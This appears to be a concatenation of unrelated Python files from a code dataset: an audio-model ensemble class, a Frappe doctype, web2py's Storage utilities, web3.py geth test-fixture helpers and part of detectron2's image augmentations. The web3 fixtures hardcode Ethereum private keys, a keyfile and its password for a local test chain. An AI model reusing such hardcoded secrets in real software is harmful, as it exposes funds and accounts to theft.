log(f"model_num: {self._model_num} Select k best {self._keep_num} predicts which have auc {self._k_best_auc}, "
f"each model {self._each_model_keep_num} best which have auc {each_model_k_aucs}, "
f"and each previous model's best predict which have auc "
f"{[f'({k}:{v})' for k, v in self._each_model_best_auc.items()]} ")
return np.mean(selected, axis=0)
@property
def data_manager(self):
return self._data_manager
def fit(self, train_loop_num=1, **kwargs):
# select model first, inorder to use preprocess data method
self._pre_select_model(train_loop_num)
log(f'fit {self._model_name} for {self._cur_model_run_loop} times')
self._cur_model_run_loop += 1
# get data
if self._round_num == 0:
train_x, train_y, val_x, val_y = self._data_manager.get_train_data(train_loop_num=train_loop_num,
model_num=self._model_num,
round_num=self._round_num,
use_new_train=self._use_new_train,
use_mfcc=self._use_mfcc)
self._is_nedd_30s = self._data_manager.need_30s
if self._is_nedd_30s:
self._use_mel_round = 3
else:
self._use_mel_round = 2
else:
if self._round_num == self._use_mel_round:
self._use_mfcc = False
else:
self._use_mfcc = True
train_x, train_y, val_x, val_y = self._data_manager.get_train_data(train_loop_num=train_loop_num,
model_num=self._model_num,
round_num=self._round_num,
use_new_train=self._use_new_train,
use_mfcc=self._use_mfcc)
self._val_set = (val_x, val_y)
self._input_shape = train_x.shape
log(f'train_x: {train_x.shape}; train_y: {train_y.shape};'
f' val_x: {val_x.shape}; val_y: {val_y.shape};')
# init model really
self._get_or_create_model()
self._model.fit(train_x, train_y, (val_x, val_y),
self._round_num, **kwargs)
def predict(self, test_x, is_final_test_x=False):
x_val, y_val = self._val_set
auc = auc_metric(y_val, self._model.predict(x_val))
need_predict = False
dif_score = 0.1
if auc > self._cur_model_max_auc:
log(
f'cur_max_auc {self._cur_model_max_auc}; cur_auc {auc}; {self._model_name} auc rise for {self._cur_model_run_loop} times')
self._cur_model_max_auc = auc
if self._round_num == 0:
self._not_rise_num = max(0, self._not_rise_num - 1)
else:
self._not_rise_num = 0
if auc > self._each_model_best_auc[LR_MODEL][-1] - dif_score:
need_predict = True
else:
self._not_rise_num += 1
log(
f'cur_max_auc {self._cur_model_max_auc}; cur_auc {auc}; {self._model_name} auc not rise for {self._not_rise_num} times')
if max(self._k_best_auc[-1], self._each_model_best_auc[LR_MODEL]
[-1] - dif_score) >= auc and not need_predict:
log('not predict')
else:
log(f'new predict')
if is_final_test_x:
if self._test_x is None:
if self._model_num == 0:
self._test_x = self._data_manager.lr_preprocess(test_x)
elif self._round_num == 0:
self._test_x = self._data_manager.nn_preprocess(test_x,
n_mfcc=96,
max_duration=FIRST_ROUND_DURATION,
is_mfcc=self._use_mfcc)
else:
self._test_x = self._data_manager.nn_preprocess(test_x,
n_mfcc=128,
max_duration=SECOND_ROUND_DURATION,
is_mfcc=self._use_mfcc)
if self._round_num > 1:
y_pred = self._model.predict(self._test_x, batch_size=32)
else:
y_pred = self._model.predict(self._test_x, batch_size=32 * 8)
if self._k_best_auc[-1] < auc and auc > self._each_model_best_auc[LR_MODEL][-1] - dif_score:
self._k_best_predicts[-1] = y_pred
self._k_best_auc[-1] = auc
if self._each_model_best_auc[self._model_name][-1] < auc:
self._each_model_best_predict[self._model_name][-1] = y_pred
self._each_model_best_auc[self._model_name][-1] = auc
i = 0
for auc, pred in sorted(
zip(self._k_best_auc, self._k_best_predicts), key=lambda x: x[0], reverse=True):
self._k_best_auc[i] = auc
self._k_best_predicts[i] = pred
i += 1
self._use_new_train = False
self._is_reset_model = False
return self._blending_ensemble()
| 44.112045 | 138 | 0.540767 |
4a1e4524728a0939102446bd86307c02279f077f | 392 | py | Python | gia/gia/doctype/gia_sector/gia_sector.py | alkuhlani/gia | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | [
"MIT"
] | null | null | null | gia/gia/doctype/gia_sector/gia_sector.py | alkuhlani/gia | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | [
"MIT"
] | null | null | null | gia/gia/doctype/gia_sector/gia_sector.py | alkuhlani/gia | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2020, Ahmed Mohammed Alkuhlani and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, throw
from frappe.model.document import Document
class GIASector(Document):
def validate(self):
if not self.parent_gia_sector:
frappe.throw(_("Please enter the parent"))
| 28 | 63 | 0.772959 |
4a1e46a7f54e2a95801606c48bddb681c93163be | 8,726 | py | Python | gluon/storage.py | gitoni/web2py | 76cfba704716b2314c28ee8bcb5b09fca34163d8 | [
"BSD-3-Clause"
] | null | null | null | gluon/storage.py | gitoni/web2py | 76cfba704716b2314c28ee8bcb5b09fca34163d8 | [
"BSD-3-Clause"
] | null | null | null | gluon/storage.py | gitoni/web2py | 76cfba704716b2314c28ee8bcb5b09fca34163d8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <[email protected]>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Provides:
- List; like list but returns None instead of IndexOutOfBounds
- Storage; like dictionary allowing also for `obj.foo` for `obj['foo']`
"""
try:
import cPickle as pickle
except:
import pickle
import copy_reg
import gluon.portalocker as portalocker
__all__ = ['List', 'Storage', 'Settings', 'Messages',
'StorageList', 'load_storage', 'save_storage']
DEFAULT = lambda: 0
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`, and setting obj.foo = None deletes item foo.
Example::
>>> o = Storage(a=1)
>>> print o.a
1
>>> o['a']
1
>>> o.a = 2
>>> print o['a']
2
>>> del o.a
>>> print o.a
None
"""
__slots__ = ()
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
__getitem__ = dict.get
__getattr__ = dict.get
__getnewargs__ = lambda self: getattr(dict,self).__getnewargs__(self)
__repr__ = lambda self: '<Storage %s>' % dict.__repr__(self)
# http://stackoverflow.com/questions/5247250/why-does-pickle-getstate-accept-as-a-return-value-the-very-instance-it-requi
__getstate__ = lambda self: None
__copy__ = lambda self: Storage(self)
def getlist(self, key):
"""
Returns a Storage value as a list.
If the value is a list it will be returned as-is.
If object is None, an empty list will be returned.
Otherwise, `[value]` will be returned.
Example output for a query string of `?x=abc&y=abc&y=def`::
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlist('x')
['abc']
>>> request.vars.getlist('y')
['abc', 'def']
>>> request.vars.getlist('z')
[]
"""
value = self.get(key, [])
if value is None or isinstance(value, (list, tuple)):
return value
else:
return [value]
def getfirst(self, key, default=None):
"""
Returns the first value of a list or the value itself when given a
`request.vars` style key.
If the value is a list, its first item will be returned;
otherwise, the value will be returned as-is.
Example output for a query string of `?x=abc&y=abc&y=def`::
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getfirst('x')
'abc'
>>> request.vars.getfirst('y')
'abc'
>>> request.vars.getfirst('z')
"""
values = self.getlist(key)
return values[0] if values else default
def getlast(self, key, default=None):
"""
        Returns the last value of a list or the value itself when given a
`request.vars` style key.
If the value is a list, the last item will be returned;
otherwise, the value will be returned as-is.
Simulated output with a query string of `?x=abc&y=abc&y=def`::
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlast('x')
'abc'
>>> request.vars.getlast('y')
'def'
>>> request.vars.getlast('z')
"""
values = self.getlist(key)
return values[-1] if values else default
def pickle_storage(s):
return Storage, (dict(s),)
copy_reg.pickle(Storage, pickle_storage)
PICKABLE = (str, int, long, float, bool, list, dict, tuple, set)
class StorageList(Storage):
"""
Behaves like Storage but missing elements defaults to [] instead of None
"""
def __getitem__(self, key):
return self.__getattr__(key)
def __getattr__(self, key):
if key in self:
return self.get(key)
else:
r = []
self[key] = r
return r
def load_storage(filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'rb')
storage = pickle.load(fp)
finally:
if fp:
fp.close()
return Storage(storage)
def save_storage(storage, filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'wb')
pickle.dump(dict(storage), fp)
finally:
if fp:
fp.close()
class Settings(Storage):
def __setattr__(self, key, value):
if key != 'lock_keys' and self['lock_keys'] and key not in self:
raise SyntaxError('setting key \'%s\' does not exist' % key)
if key != 'lock_values' and self['lock_values']:
raise SyntaxError('setting value cannot be changed: %s' % key)
self[key] = value
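# Illustrative sketch, not part of the original module: how lock_keys and
# lock_values guard a Settings object. The attribute names are examples only.
def _example_settings_locking():
    settings = Settings()
    settings.lock_keys = False
    settings.lock_values = False
    settings.timeout = 30        # new keys may be added while lock_keys is False
    settings.lock_keys = True    # from here, settings.retries = 3 would raise SyntaxError
    settings.timeout = 60        # existing keys can still be changed
    settings.lock_values = True  # from here, settings.timeout = 90 would raise too
    return settings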
class Messages(Settings):
def __init__(self, T):
Storage.__init__(self, T=T)
def __getattr__(self, key):
value = self[key]
if isinstance(value, str):
return self.T(value)
return value
class FastStorage(dict):
"""
Eventually this should replace class Storage but causes memory leak
because of http://bugs.python.org/issue1469629
>>> s = FastStorage()
>>> s.a = 1
>>> s.a
1
>>> s['a']
1
>>> s.b
>>> s['b']
>>> s['b']=2
>>> s['b']
2
>>> s.b
2
>>> isinstance(s,dict)
True
>>> dict(s)
{'a': 1, 'b': 2}
>>> dict(FastStorage(s))
{'a': 1, 'b': 2}
>>> import pickle
>>> s = pickle.loads(pickle.dumps(s))
>>> dict(s)
{'a': 1, 'b': 2}
>>> del s.b
>>> del s.a
>>> s.a
>>> s.b
>>> s['a']
>>> s['b']
"""
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__ = self
def __getattr__(self, key):
return getattr(self, key) if key in self else None
def __getitem__(self, key):
return dict.get(self, key, None)
def copy(self):
self.__dict__ = {}
s = FastStorage(self)
self.__dict__ = self
return s
def __repr__(self):
return '<Storage %s>' % dict.__repr__(self)
def __getstate__(self):
return dict(self)
def __setstate__(self, sdict):
dict.__init__(self, sdict)
self.__dict__ = self
def update(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__ = self
class List(list):
"""
Like a regular python list but a[i] if i is out of bounds returns None
instead of `IndexOutOfBounds`.
"""
def __call__(self, i, default=DEFAULT, cast=None, otherwise=None):
"""Allows to use a special syntax for fast-check of `request.args()`
validity
Args:
i: index
default: use this value if arg not found
cast: type cast
otherwise: can be:
- None: results in a 404
- str: redirect to this address
- callable: calls the function (nothing is passed)
Example:
You can use::
request.args(0,default=0,cast=int,otherwise='http://error_url')
request.args(0,default=0,cast=int,otherwise=lambda:...)
"""
value = self[i]
if not value and default is not DEFAULT:
value, cast, otherwise = default, False, False
try:
if cast:
value = cast(value)
if not value and otherwise:
raise ValueError('Otherwise will raised.')
except (ValueError, TypeError):
from http import HTTP, redirect
if otherwise is None:
raise HTTP(404)
elif isinstance(otherwise, str):
redirect(otherwise)
elif callable(otherwise):
return otherwise()
else:
raise RuntimeError("invalid otherwise")
return value
def __getitem__(self, i):
n = len(self)
if 0 <= i < n or -n <= i < 0:
return super(List, self).__getitem__(i)
return None
if __name__ == '__main__':
import doctest
doctest.testmod()
| 26.932099 | 125 | 0.54011 |
4a1e482706b0fe2f57851f6ade703b686afe5de9 | 1,456 | py | Python | sims/ac.py | joshua-hampton/phue-racing-flags | 4a4247fba591f120c8be74418c915d791855f757 | [
"MIT"
] | 50 | 2021-06-04T21:30:55.000Z | 2022-01-07T15:31:32.000Z | sims/ac.py | joshua-hampton/phue-racing-flags | 4a4247fba591f120c8be74418c915d791855f757 | [
"MIT"
] | 11 | 2021-06-05T07:40:53.000Z | 2022-02-16T08:37:41.000Z | sims/ac.py | joshua-hampton/phue-racing-flags | 4a4247fba591f120c8be74418c915d791855f757 | [
"MIT"
] | 3 | 2021-06-07T19:55:33.000Z | 2021-12-23T05:27:25.000Z | from ctypes import Structure, sizeof, c_float, c_wchar, c_int
import mmap
from enum import Enum
class SPageFileGraphic(Structure):
_fields_ = [
("packetId", c_int),
("AC_STATUS", c_int),
("AC_SESSION_TYPE", c_int),
("currentTime", c_wchar * 15),
("lastTime", c_wchar * 15),
("bestTime", c_wchar * 15),
("split", c_wchar * 15),
("completedLaps", c_int),
("position", c_int),
("iCurrentTime", c_int),
("iLastTime", c_int),
("iBestTime", c_int),
("sessionTimeLeft", c_float),
("distanceTraveled", c_float),
("isInPit", c_int),
("currentSectorIndex", c_int),
("lastSectorTime", c_int),
("numberOfLaps", c_int),
("tyreCompound", c_wchar * 33),
("replayTimeMultiplier", c_float),
("normalizedCarPosition", c_float),
("carCoordinates", c_float * 3),
("penaltyTime", c_float),
("flag", c_int),
("idealLineOn", c_int),
("isInPitLane", c_int),
("surfaceGrip", c_float),
]
class ACFlagType(Enum):
AC_NO_FLAG = 0
AC_BLUE_FLAG = 1
AC_YELLOW_FLAG = 2
AC_BLACK_FLAG = 3
AC_WHITE_FLAG = 4
AC_CHECKERED_FLAG = 5
AC_PENALTY_FLAG = 6
def get_flag() -> ACFlagType:
    """Read the current flag from Assetto Corsa's shared-memory graphics page."""
buf = mmap.mmap(-1, sizeof(SPageFileGraphic), u"Local\\acpmf_graphics")
data = SPageFileGraphic.from_buffer(buf)
return ACFlagType(data.flag) | 28.54902 | 75 | 0.584478 |
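# Illustrative sketch, not part of the original module: poll the shared memory
# and react to the current flag. The one-second interval is an arbitrary choice.
def _example_poll_flag(iterations=5):
    import time
    for _ in range(iterations):
        flag = get_flag()
        print("Current flag:", flag.name)
        time.sleep(1)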
4a1e490f80b1432729bd1da24476ec9af71e1ac7 | 7,012 | py | Python | tests/integration/generate_fixtures/common.py | kseikyo/web3.py | 8bc987e8ec2089133fbaf870dd0daa71e7447584 | [
"MIT"
] | 2 | 2019-09-27T09:33:10.000Z | 2019-10-09T10:34:04.000Z | tests/integration/generate_fixtures/common.py | kseikyo/web3.py | 8bc987e8ec2089133fbaf870dd0daa71e7447584 | [
"MIT"
] | null | null | null | tests/integration/generate_fixtures/common.py | kseikyo/web3.py | 8bc987e8ec2089133fbaf870dd0daa71e7447584 | [
"MIT"
] | 2 | 2019-02-26T23:01:31.000Z | 2019-03-03T02:10:57.000Z | import contextlib
import os
import shutil
import signal
import socket
import subprocess
import tempfile
import time
from eth_utils import (
is_checksum_address,
to_text,
)
from web3.exceptions import (
TransactionNotFound,
)
COINBASE = '0xdc544d1aa88ff8bbd2f2aec754b1f1e99e1812fd'
COINBASE_PK = '0x58d23b55bc9cdce1f18c2500f40ff4ab7245df9a89505e9b1fa4851f623d241d'
KEYFILE_DATA = '{"address":"dc544d1aa88ff8bbd2f2aec754b1f1e99e1812fd","crypto":{"cipher":"aes-128-ctr","ciphertext":"52e06bc9397ea9fa2f0dae8de2b3e8116e92a2ecca9ad5ff0061d1c449704e98","cipherparams":{"iv":"aa5d0a5370ef65395c1a6607af857124"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"9fdf0764eb3645ffc184e166537f6fe70516bf0e34dc7311dea21f100f0c9263"},"mac":"4e0b51f42b865c15c485f4faefdd1f01a38637e5247f8c75ffe6a8c0eba856f6"},"id":"5a6124e0-10f1-4c1c-ae3e-d903eacb740a","version":3}' # noqa: E501
KEYFILE_PW = 'web3py-test'
KEYFILE_FILENAME = 'UTC--2017-08-24T19-42-47.517572178Z--dc544d1aa88ff8bbd2f2aec754b1f1e99e1812fd' # noqa: E501
RAW_TXN_ACCOUNT = '0x39EEed73fb1D3855E90Cbd42f348b3D7b340aAA6'
UNLOCKABLE_PRIVATE_KEY = '0x392f63a79b1ff8774845f3fa69de4a13800a59e7083f5187f1558f0797ad0f01'
UNLOCKABLE_ACCOUNT = '0x12efdc31b1a8fa1a1e756dfd8a1601055c971e13'
UNLOCKABLE_ACCOUNT_PW = KEYFILE_PW
GENESIS_DATA = {
"config": {
"chainId": 1337,
"homesteadBlock": 0,
"eip150Block": 0,
"eip155Block": 10,
"eip158Block": 10,
"eip160Block": 10,
},
"nonce": "0x0000000000000042",
"alloc": {
COINBASE: {
"balance": "1000000000000000000000000000"
},
UNLOCKABLE_ACCOUNT: {
"balance": "1000000000000000000000000000"
},
RAW_TXN_ACCOUNT: {
"balance": "1000000000000000000000000000"
}
},
"timestamp": "0x00",
"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"extraData": "0x3535353535353535353535353535353535353535353535353535353535353535",
"gasLimit": "0x1000000",
"difficulty": "0x10000",
"mixhash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"coinbase": COINBASE
}
def ensure_path_exists(dir_path):
"""
Make sure that a path exists
"""
if not os.path.exists(dir_path):
os.makedirs(dir_path)
return True
return False
@contextlib.contextmanager
def tempdir():
dir_path = tempfile.mkdtemp()
try:
yield dir_path
finally:
shutil.rmtree(dir_path)
def get_geth_binary():
from geth.install import (
get_executable_path,
install_geth,
)
if 'GETH_BINARY' in os.environ:
return os.environ['GETH_BINARY']
elif 'GETH_VERSION' in os.environ:
geth_version = os.environ['GETH_VERSION']
_geth_binary = get_executable_path(geth_version)
if not os.path.exists(_geth_binary):
install_geth(geth_version)
assert os.path.exists(_geth_binary)
return _geth_binary
else:
return 'geth'
def wait_for_popen(proc, timeout):
start = time.time()
while time.time() < start + timeout:
if proc.poll() is None:
time.sleep(0.01)
else:
break
def kill_proc_gracefully(proc):
if proc.poll() is None:
proc.send_signal(signal.SIGINT)
wait_for_popen(proc, 13)
if proc.poll() is None:
proc.terminate()
wait_for_popen(proc, 5)
if proc.poll() is None:
proc.kill()
wait_for_popen(proc, 2)
def wait_for_socket(ipc_path, timeout=30):
start = time.time()
while time.time() < start + timeout:
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(ipc_path)
sock.settimeout(timeout)
except (FileNotFoundError, socket.error):
time.sleep(0.01)
else:
break
@contextlib.contextmanager
def get_geth_process(geth_binary,
datadir,
genesis_file_path,
ipc_path,
port,
networkid,
skip_init=False):
if not skip_init:
init_datadir_command = (
geth_binary,
'--datadir', datadir,
'init',
genesis_file_path,
)
print(' '.join(init_datadir_command))
subprocess.check_output(
init_datadir_command,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
run_geth_command = (
geth_binary,
'--datadir', datadir,
'--ipcpath', ipc_path,
'--nodiscover',
'--port', port,
'--networkid', networkid,
'--etherbase', COINBASE[2:],
)
print(' '.join(run_geth_command))
try:
proc = get_process(run_geth_command)
yield proc
finally:
kill_proc_gracefully(proc)
output, errors = proc.communicate()
print(
"Geth Process Exited:\n"
"stdout:{0}\n\n"
"stderr:{1}\n\n".format(
to_text(output),
to_text(errors),
)
)
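# Illustrative sketch, not part of the original fixtures: how the helpers above
# are typically combined to boot a throwaway geth node. The port and network id
# are arbitrary example values.
def _example_boot_geth():
    import json
    with tempdir() as datadir:
        genesis_file_path = os.path.join(datadir, 'genesis.json')
        with open(genesis_file_path, 'w') as genesis_file:
            json.dump(GENESIS_DATA, genesis_file)
        ipc_path = os.path.join(datadir, 'geth.ipc')
        with get_geth_process(get_geth_binary(), datadir, genesis_file_path,
                              ipc_path, '30999', '1337') as proc:
            wait_for_socket(ipc_path)
            # a Web3 IPCProvider could now be pointed at ipc_path
            return proc.poll() is None  # True while the node is still running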
def get_process(run_command):
proc = subprocess.Popen(
run_command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1,
)
return proc
def mine_block(web3):
origin_block_number = web3.eth.blockNumber
start_time = time.time()
web3.geth.miner.start(1)
while time.time() < start_time + 120:
block_number = web3.eth.blockNumber
if block_number > origin_block_number:
web3.geth.miner.stop()
return block_number
else:
time.sleep(0.1)
else:
raise ValueError("No block mined during wait period")
def mine_transaction_hash(web3, txn_hash):
start_time = time.time()
web3.geth.miner.start(1)
while time.time() < start_time + 120:
try:
receipt = web3.eth.getTransactionReceipt(txn_hash)
except TransactionNotFound:
continue
if receipt is not None:
web3.geth.miner.stop()
return receipt
else:
time.sleep(0.1)
else:
raise ValueError("Math contract deploy transaction not mined during wait period")
def deploy_contract(web3, name, factory):
web3.geth.personal.unlockAccount(web3.eth.coinbase, KEYFILE_PW)
deploy_txn_hash = factory.constructor().transact({'from': web3.eth.coinbase})
print('{0}_CONTRACT_DEPLOY_HASH: '.format(name.upper()), deploy_txn_hash)
deploy_receipt = mine_transaction_hash(web3, deploy_txn_hash)
print('{0}_CONTRACT_DEPLOY_TRANSACTION_MINED'.format(name.upper()))
contract_address = deploy_receipt['contractAddress']
assert is_checksum_address(contract_address)
print('{0}_CONTRACT_ADDRESS:'.format(name.upper()), contract_address)
return deploy_receipt
| 29.216667 | 522 | 0.642042 |
4a1e494b1e8cf4a5039ef6a43c0f89346ada670b | 22,339 | py | Python | detectron2/data/transforms/augmentation_impl.py | sourcery-ai-bot/detectron2 | fd0c5c59afbdc43f7005fb1a8c0c39ac5dc44039 | [
"Apache-2.0"
] | null | null | null | detectron2/data/transforms/augmentation_impl.py | sourcery-ai-bot/detectron2 | fd0c5c59afbdc43f7005fb1a8c0c39ac5dc44039 | [
"Apache-2.0"
] | null | null | null | detectron2/data/transforms/augmentation_impl.py | sourcery-ai-bot/detectron2 | fd0c5c59afbdc43f7005fb1a8c0c39ac5dc44039 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
"""
Implement many useful :class:`Augmentation`.
"""
import numpy as np
import sys
from typing import Tuple
from fvcore.transforms.transform import (
BlendTransform,
CropTransform,
HFlipTransform,
NoOpTransform,
PadTransform,
Transform,
TransformList,
VFlipTransform,
)
from PIL import Image
from .augmentation import Augmentation, _transform_to_aug
from .transform import ExtentTransform, ResizeTransform, RotationTransform
__all__ = [
"FixedSizeCrop",
"RandomApply",
"RandomBrightness",
"RandomContrast",
"RandomCrop",
"RandomExtent",
"RandomFlip",
"RandomSaturation",
"RandomLighting",
"RandomRotation",
"Resize",
"ResizeScale",
"ResizeShortestEdge",
"RandomCrop_CategoryAreaConstraint",
]
class RandomApply(Augmentation):
"""
Randomly apply an augmentation with a given probability.
"""
def __init__(self, tfm_or_aug, prob=0.5):
"""
Args:
tfm_or_aug (Transform, Augmentation): the transform or augmentation
to be applied. It can either be a `Transform` or `Augmentation`
instance.
prob (float): probability between 0.0 and 1.0 that
the wrapper transformation is applied
"""
super().__init__()
self.aug = _transform_to_aug(tfm_or_aug)
assert 0.0 <= prob <= 1.0, f"Probablity must be between 0.0 and 1.0 (given: {prob})"
self.prob = prob
def get_transform(self, *args):
do = self._rand_range() < self.prob
return self.aug.get_transform(*args) if do else NoOpTransform()
def __call__(self, aug_input):
do = self._rand_range() < self.prob
return self.aug(aug_input) if do else NoOpTransform()
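# Illustrative sketch, not part of the original module: wrap another
# augmentation so it fires on roughly 30% of inputs. The dummy image and
# probabilities are example values.
def _example_random_apply():
    aug = RandomApply(RandomFlip(prob=1.0, horizontal=True), prob=0.3)
    dummy_image = np.zeros((480, 640, 3), dtype=np.uint8)
    return aug.get_transform(dummy_image)  # HFlipTransform ~30% of the time, else NoOpTransform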
class RandomFlip(Augmentation):
"""
Flip the image horizontally or vertically with the given probability.
"""
def __init__(self, prob=0.5, *, horizontal=True, vertical=False):
"""
Args:
prob (float): probability of flip.
horizontal (boolean): whether to apply horizontal flipping
vertical (boolean): whether to apply vertical flipping
"""
super().__init__()
if horizontal and vertical:
raise ValueError("Cannot do both horiz and vert. Please use two Flip instead.")
if not horizontal and not vertical:
raise ValueError("At least one of horiz or vert has to be True!")
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
do = self._rand_range() < self.prob
if do:
if self.horizontal:
return HFlipTransform(w)
elif self.vertical:
return VFlipTransform(h)
else:
return NoOpTransform()
class Resize(Augmentation):
"""Resize image to a fixed target size"""
def __init__(self, shape, interp=Image.BILINEAR):
"""
Args:
shape: (h, w) tuple or a int
interp: PIL interpolation method
"""
if isinstance(shape, int):
shape = (shape, shape)
shape = tuple(shape)
self._init(locals())
def get_transform(self, image):
return ResizeTransform(
image.shape[0], image.shape[1], self.shape[0], self.shape[1], self.interp
)
class ResizeShortestEdge(Augmentation):
"""
Scale the shorter edge to the given size, with a limit of `max_size` on the longer edge.
If `max_size` is reached, then downscale so that the longer edge does not exceed max_size.
"""
def __init__(
self, short_edge_length, max_size=sys.maxsize, sample_style="range", interp=Image.BILINEAR
):
"""
Args:
short_edge_length (list[int]): If ``sample_style=="range"``,
a [min, max] interval from which to sample the shortest edge length.
If ``sample_style=="choice"``, a list of shortest edge lengths to sample from.
max_size (int): maximum allowed longest edge length.
sample_style (str): either "range" or "choice".
"""
super().__init__()
assert sample_style in ["range", "choice"], sample_style
self.is_range = sample_style == "range"
if isinstance(short_edge_length, int):
short_edge_length = (short_edge_length, short_edge_length)
if self.is_range:
assert len(short_edge_length) == 2, (
"short_edge_length must be two values using 'range' sample style."
f" Got {short_edge_length}!"
)
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
if self.is_range:
size = np.random.randint(self.short_edge_length[0], self.short_edge_length[1] + 1)
else:
size = np.random.choice(self.short_edge_length)
if size == 0:
return NoOpTransform()
scale = size * 1.0 / min(h, w)
newh, neww = (size, scale * w) if h < w else (scale * h, size)
if max(newh, neww) > self.max_size:
scale = self.max_size * 1.0 / max(newh, neww)
newh = newh * scale
neww = neww * scale
neww = int(neww + 0.5)
newh = int(newh + 0.5)
return ResizeTransform(h, w, newh, neww, self.interp)
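# Illustrative sketch, not part of the original module: a "choice"-style
# training resize. The edge lengths and max size are example values.
def _example_resize_shortest_edge():
    aug = ResizeShortestEdge([640, 672, 704], max_size=1333, sample_style="choice")
    dummy_image = np.zeros((480, 640, 3), dtype=np.uint8)
    tfm = aug.get_transform(dummy_image)
    return tfm.apply_image(dummy_image).shape  # shorter edge becomes one of 640/672/704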
class ResizeScale(Augmentation):
"""
Takes target size as input and randomly scales the given target size between `min_scale`
and `max_scale`. It then scales the input image such that it fits inside the scaled target
box, keeping the aspect ratio constant.
This implements the resize part of the Google's 'resize_and_crop' data augmentation:
https://github.com/tensorflow/tpu/blob/master/models/official/detection/utils/input_utils.py#L127
"""
def __init__(
self,
min_scale: float,
max_scale: float,
target_height: int,
target_width: int,
interp: int = Image.BILINEAR,
):
"""
Args:
min_scale: minimum image scale range.
max_scale: maximum image scale range.
target_height: target image height.
target_width: target image width.
interp: image interpolation method.
"""
super().__init__()
self._init(locals())
def _get_resize(self, image: np.ndarray, scale: float) -> Transform:
input_size = image.shape[:2]
# Compute new target size given a scale.
target_size = (self.target_height, self.target_width)
target_scale_size = np.multiply(target_size, scale)
# Compute actual rescaling applied to input image and output size.
output_scale = np.minimum(
target_scale_size[0] / input_size[0], target_scale_size[1] / input_size[1]
)
output_size = np.round(np.multiply(input_size, output_scale)).astype(int)
return ResizeTransform(
input_size[0], input_size[1], output_size[0], output_size[1], self.interp
)
def get_transform(self, image: np.ndarray) -> Transform:
random_scale = np.random.uniform(self.min_scale, self.max_scale)
return self._get_resize(image, random_scale)
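# Illustrative worked example, not part of the original module: for a 480x640
# input, a 1024x1024 target and a sampled scale of 0.5, the scaled target box
# is 512x512, output_scale = min(512/480, 512/640) = 0.8, and the image is
# resized to 384x512 (aspect ratio preserved) before any crop/pad step.
def _example_resize_scale():
    aug = ResizeScale(min_scale=0.5, max_scale=0.5, target_height=1024, target_width=1024)
    dummy_image = np.zeros((480, 640, 3), dtype=np.uint8)
    tfm = aug.get_transform(dummy_image)
    return tfm.apply_image(dummy_image).shape  # (384, 512, 3)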
class RandomRotation(Augmentation):
"""
This method returns a copy of this image, rotated the given
number of degrees counter clockwise around the given center.
"""
def __init__(self, angle, expand=True, center=None, sample_style="range", interp=None):
"""
Args:
angle (list[float]): If ``sample_style=="range"``,
a [min, max] interval from which to sample the angle (in degrees).
If ``sample_style=="choice"``, a list of angles to sample from
expand (bool): choose if the image should be resized to fit the whole
rotated image (default), or simply cropped
center (list[[float, float]]): If ``sample_style=="range"``,
a [[minx, miny], [maxx, maxy]] relative interval from which to sample the center,
[0, 0] being the top left of the image and [1, 1] the bottom right.
If ``sample_style=="choice"``, a list of centers to sample from
Default: None, which means that the center of rotation is the center of the image
center has no effect if expand=True because it only affects shifting
"""
super().__init__()
assert sample_style in ["range", "choice"], sample_style
self.is_range = sample_style == "range"
if isinstance(angle, (float, int)):
angle = (angle, angle)
if center is not None and isinstance(center[0], (float, int)):
center = (center, center)
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
center = None
if self.is_range:
angle = np.random.uniform(self.angle[0], self.angle[1])
if self.center is not None:
center = (
np.random.uniform(self.center[0][0], self.center[1][0]),
np.random.uniform(self.center[0][1], self.center[1][1]),
)
else:
angle = np.random.choice(self.angle)
if self.center is not None:
center = np.random.choice(self.center)
if center is not None:
center = (w * center[0], h * center[1]) # Convert to absolute coordinates
if angle % 360 == 0:
return NoOpTransform()
return RotationTransform(h, w, angle, expand=self.expand, center=center, interp=self.interp)
class FixedSizeCrop(Augmentation):
"""
If `crop_size` is smaller than the input image size, then it uses a random crop of
the crop size. If `crop_size` is larger than the input image size, then it pads
the right and the bottom of the image to the crop size if `pad` is True, otherwise
it returns the smaller image.
"""
def __init__(self, crop_size: Tuple[int], pad: bool = True, pad_value: float = 128.0):
"""
Args:
crop_size: target image (height, width).
pad: if True, will pad images smaller than `crop_size` up to `crop_size`
pad_value: the padding value.
"""
super().__init__()
self._init(locals())
def _get_crop(self, image: np.ndarray) -> Transform:
# Compute the image scale and scaled size.
input_size = image.shape[:2]
output_size = self.crop_size
# Add random crop if the image is scaled up.
